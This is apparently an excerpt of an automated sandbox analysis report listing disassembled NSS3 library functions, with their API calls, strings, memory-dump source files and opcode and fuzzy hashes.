Opcode Fuzzy Hash: 65ddf9f3e914946a99e1df82adcc6182f1b0281be08cf8c3ca4ebd1f336fd1de
Instruction Fuzzy Hash: 8C312575E00605AFEB009F69D844966B778EF1925CB648164ED089B721EB31EC95C7E0

Function 6CEC1EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&l,6CEA6295,?,00000000,?,00000001,S&l,?), ref: 6CEC1ECB

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

TlsGetValue.KERNEL32(?,00000001,?,S&l,6CEA6295,?,00000000,?,00000001,S&l,?), ref: 6CEC1EF1
EnterCriticalSection.KERNEL32(?), ref: 6CEC1F01
PR_SetError.NSS3(00000000,00000000), ref: 6CEC1F39

Part of subcall function 6CECFE20: TlsGetValue.KERNEL32(6CEA5ADC,?,00000000,00000001,?,?,00000000,?,6CE9BA55,?,?), ref: 6CECFE4B
Part of subcall function 6CECFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CECFE5F

PR_Unlock.NSS3(?), ref: 6CEC1F67

Strings

S&l, xrefs: 6CEC1EA0

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID: S&l
API String ID: 704537481-539497627
Opcode ID: 1455d1c8f3f3ec9fbe7780828320d96cc40d657ed147d1fadd658ad884d4a818
Instruction ID: 23bfe4a13b5ac1d22a36d862d4e19c6e5f513cb1fd447aabbc6b8d419649e731
Opcode Fuzzy Hash: 1455d1c8f3f3ec9fbe7780828320d96cc40d657ed147d1fadd658ad884d4a818
Instruction Fuzzy Hash: AC21F271B00244AFEB00AEA9DC46B9A3779AF4536CF244164FD288B711EB30E954C7E2

Function 6CEECEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CEECD93,?), ref: 6CEECEEE

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CEECD93,?), ref: 6CEECEFC

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CEECD93,?), ref: 6CEECF0B

Part of subcall function 6CEE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CEECD93,?), ref: 6CEECF1D

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CEECD93,?), ref: 6CEECF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CEECD93,?), ref: 6CEECF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CEECD93,?,?,?,?,?,?,?,?,?,?,?,6CEECD93,?), ref: 6CEECF78

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 5c2ab8c4b30ddfda98b4535c6aba492514edd41829a3183d25b77f5eb33046da
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 8911C3A1B003005BEB04ABA66C42B6B79FC9F4C18DF24443DAC09D7741FB70DA08C6A1

Function 6CE98C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE98C1B
EnterCriticalSection.KERNEL32 ref: 6CE98C34
PL_ArenaAllocate.NSS3 ref: 6CE98C65
PR_Unlock.NSS3 ref: 6CE98C9C
PR_Unlock.NSS3 ref: 6CE98CB6

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

Strings

KRAM, xrefs: 6CE98C8F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 0057e9ad0ece1ba96d702598f37e5cce41f541caef790efc3c2e4c32b19d87c3
Instruction ID: ce5e7f787c4cb9548ab4df2a25b52635f2dd945e11a44485d2bd25eb148f2bc3
Opcode Fuzzy Hash: 0057e9ad0ece1ba96d702598f37e5cce41f541caef790efc3c2e4c32b19d87c3
Instruction Fuzzy Hash: D02197B1A056018FD700AF78C484659F7F4FF45308F25896ED888CB711EB35E886CB92

Function 6CEA8E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CEC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE94F1C), ref: 6CEA8EA2

Part of subcall function 6CECF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CECF854
Part of subcall function 6CECF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CECF868
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CECF882
Part of subcall function 6CECF820: free.MOZGLUE(04C483FF,?,?), ref: 6CECF889
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CECF8A4
Part of subcall function 6CECF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CECF8AB
Part of subcall function 6CECF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CECF8C9
Part of subcall function 6CECF820: free.MOZGLUE(280F10EC,?,?), ref: 6CECF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CEC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE94F1C), ref: 6CEA8EC3
TlsGetValue.KERNEL32(?,?,?,6CEC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE94F1C), ref: 6CEA8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CEC2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CEA8EF1
PR_Unlock.NSS3 ref: 6CEA8F20

Strings

b.l, xrefs: 6CEA8E96, 6CEA8F25

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.l
API String ID: 1978757487-3749612370
Opcode ID: 888fbcbcb79d479ab52de55e3131155dbd244d0bd8e584bcbf5f2319332356c5
Instruction ID: 2ac45c732f9e78be62efe46a89e5c91dd0d83c0f2b4b7cb39c9a42a301f5ebe6
Opcode Fuzzy Hash: 888fbcbcb79d479ab52de55e3131155dbd244d0bd8e584bcbf5f2319332356c5
Instruction Fuzzy Hash: EA219C74A097459FCB10AF69D484299BBF0FF08318F51856EE8989BB40D734E855CBC2

Function 6CF13E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6CF15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CF15B56

PR_EnterMonitor.NSS3(?), ref: 6CF13E45

Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490AB
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF490C9
Part of subcall function 6CF49090: EnterCriticalSection.KERNEL32 ref: 6CF490E5
Part of subcall function 6CF49090: TlsGetValue.KERNEL32 ref: 6CF49116
Part of subcall function 6CF49090: LeaveCriticalSection.KERNEL32 ref: 6CF4913F

PR_EnterMonitor.NSS3(?), ref: 6CF13E5C
PR_EnterMonitor.NSS3(?), ref: 6CF13E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CF13EA6

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PR_ExitMonitor.NSS3(?), ref: 6CF13EC0
PR_ExitMonitor.NSS3(?), ref: 6CF13ED7
PR_ExitMonitor.NSS3(?), ref: 6CF13EEE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 20bde9fd5e0dcdc8298f04f2c6c49c3d30e4ce966afab2e16946ee01448d1548
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 3F118775614700AFDB319E39FC02BC7B7A5DB41318F404834E65A87E21EA36E92DD742

Function 6CF92C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CF92CA0
PR_ExitMonitor.NSS3 ref: 6CF92CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CF92CD1
strdup.MOZGLUE(?), ref: 6CF92CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CF92D27

Strings

Loaded library %s (static lib), xrefs: 6CF92D22

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: f3161c6a5462aa744f56fd3318f794b6309da7a9a2cb23e909d3ecf2dd530a50
Instruction ID: ccf442ef570a994c9ec7fbec1783b3f6fe23d2998e4db21ee8e72a4c39524a9d
Opcode Fuzzy Hash: f3161c6a5462aa744f56fd3318f794b6309da7a9a2cb23e909d3ecf2dd530a50
Instruction Fuzzy Hash: 201193B5B11210AFEF948F25D84476677B4AB4931DF14852DD909C7B52D732E808CBA1

Function 6CE8BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE8BDCA

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE8BDDB

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE8BDEC

Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CE8BE03

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE8BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE8BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE8BE3B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 31e19959a8153929f234044a9f2ef78496810472dfa2a598325ad967d43eac9e
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: E001DB65E426156BF71013A66C01F5B76684F5528DF340034FE089EBC2FB55E51982F6

Function 6CEE0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016

Part of subcall function 6CF498D0: calloc.MOZGLUE(00000001,00000084,6CE70936,00000001,?,6CE7102C), ref: 6CF498E5

PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B
TlsGetValue.KERNEL32(00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1044
free.MOZGLUE(00000000,?,00000800,6CE7EF74,00000000), ref: 6CEE1064

Strings

security, xrefs: 6CEE1025

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: dff04a51e38830784765045bf4175f8cb6a87c4f17c79c26f54bfd7806b69781
Instruction ID: 9108a9690b524b533234595d01b8e9806517a15dc8265cdf964b92c4d4c393f4
Opcode Fuzzy Hash: dff04a51e38830784765045bf4175f8cb6a87c4f17c79c26f54bfd7806b69781
Instruction Fuzzy Hash: B1014870A102505BEBA02F7D9C047463B78BF0B7C9F21011AE908D6A63EB71D184DBE1

Function 6CF11C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF11C74

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6CF11C92
free.MOZGLUE(?), ref: 6CF11C99
DeleteCriticalSection.KERNEL32(?), ref: 6CF11CCB
free.MOZGLUE(?), ref: 6CF11CD2

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: a2a4e16a3f380360e73c84e835c441477aaed115d9bf1230aff24e1791aa1a93
Instruction ID: d5abdc1fa573643b3185bd3144783709c8eb052310878992e3eaf0172a2cc1b8
Opcode Fuzzy Hash: a2a4e16a3f380360e73c84e835c441477aaed115d9bf1230aff24e1791aa1a93
Instruction Fuzzy Hash: 8101D6B1F256626FEFE4AFF49C0D78A37746B1E708F000124E509A6A40FB26E1048791

Function 6CF22E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF23046

Part of subcall function 6CF0EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF0EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CEF7FFB), ref: 6CF2312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF23154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF22E8B

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

Part of subcall function 6CF0F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CEF9BFF,?,00000000,00000000), ref: 6CF0F134

memcpy.VCRUNTIME140(8B3C75C0,?,6CEF7FFA), ref: 6CF22EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF2317B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 8e9fffdd6ffdb0cd19dfd09f80a5e00aab9afecc7b39c7654335b36592b5332f
Instruction ID: abf6903dbf83304466caf120fabd3c0b69992a4ea5b53d68f9e70bf1ca9089e9
Opcode Fuzzy Hash: 8e9fffdd6ffdb0cd19dfd09f80a5e00aab9afecc7b39c7654335b36592b5332f
Instruction Fuzzy Hash: 48A1BF71A002189FDB24CF54CC80BEAB7B5EF49318F148199ED496B741E735AE85CFA2

Function 6CEEED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CEEED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CEEEDCE

Part of subcall function 6CEE0BE0: malloc.MOZGLUE(6CED8D2D,?,00000000,?), ref: 6CEE0BF8
Part of subcall function 6CEE0BE0: TlsGetValue.KERNEL32(6CED8D2D,?,00000000,?), ref: 6CEE0C15

free.MOZGLUE(00000000,?,?,?,?,6CEEB04F), ref: 6CEEEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CEEEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CEEEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CEEEEFB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 67fa3f53f30c260c1eb4c984cffb910650c03f07d287e913d884bd2969a2e96c
Instruction ID: 0c4c318b629c1f00d30598342f2b62c19cd6a9d30e7c8dceff0cf79c7c03ae0c
Opcode Fuzzy Hash: 67fa3f53f30c260c1eb4c984cffb910650c03f07d287e913d884bd2969a2e96c
Instruction Fuzzy Hash: A9818CB1A006059FEB14CF55D881BAB7BF5AF8C388F24442CE8159B761DB30E905CBE1

Function 6CEECCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CEEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CEEDAE2,?), ref: 6CEEC6C2

PR_Now.NSS3 ref: 6CEECD35

Part of subcall function 6CF49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DC6
Part of subcall function 6CF49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DD1
Part of subcall function 6CF49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF49DED

Part of subcall function 6CED6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE81C6F,00000000,00000004,?,?), ref: 6CED6C3F

PR_GetCurrentThread.NSS3 ref: 6CEECD54

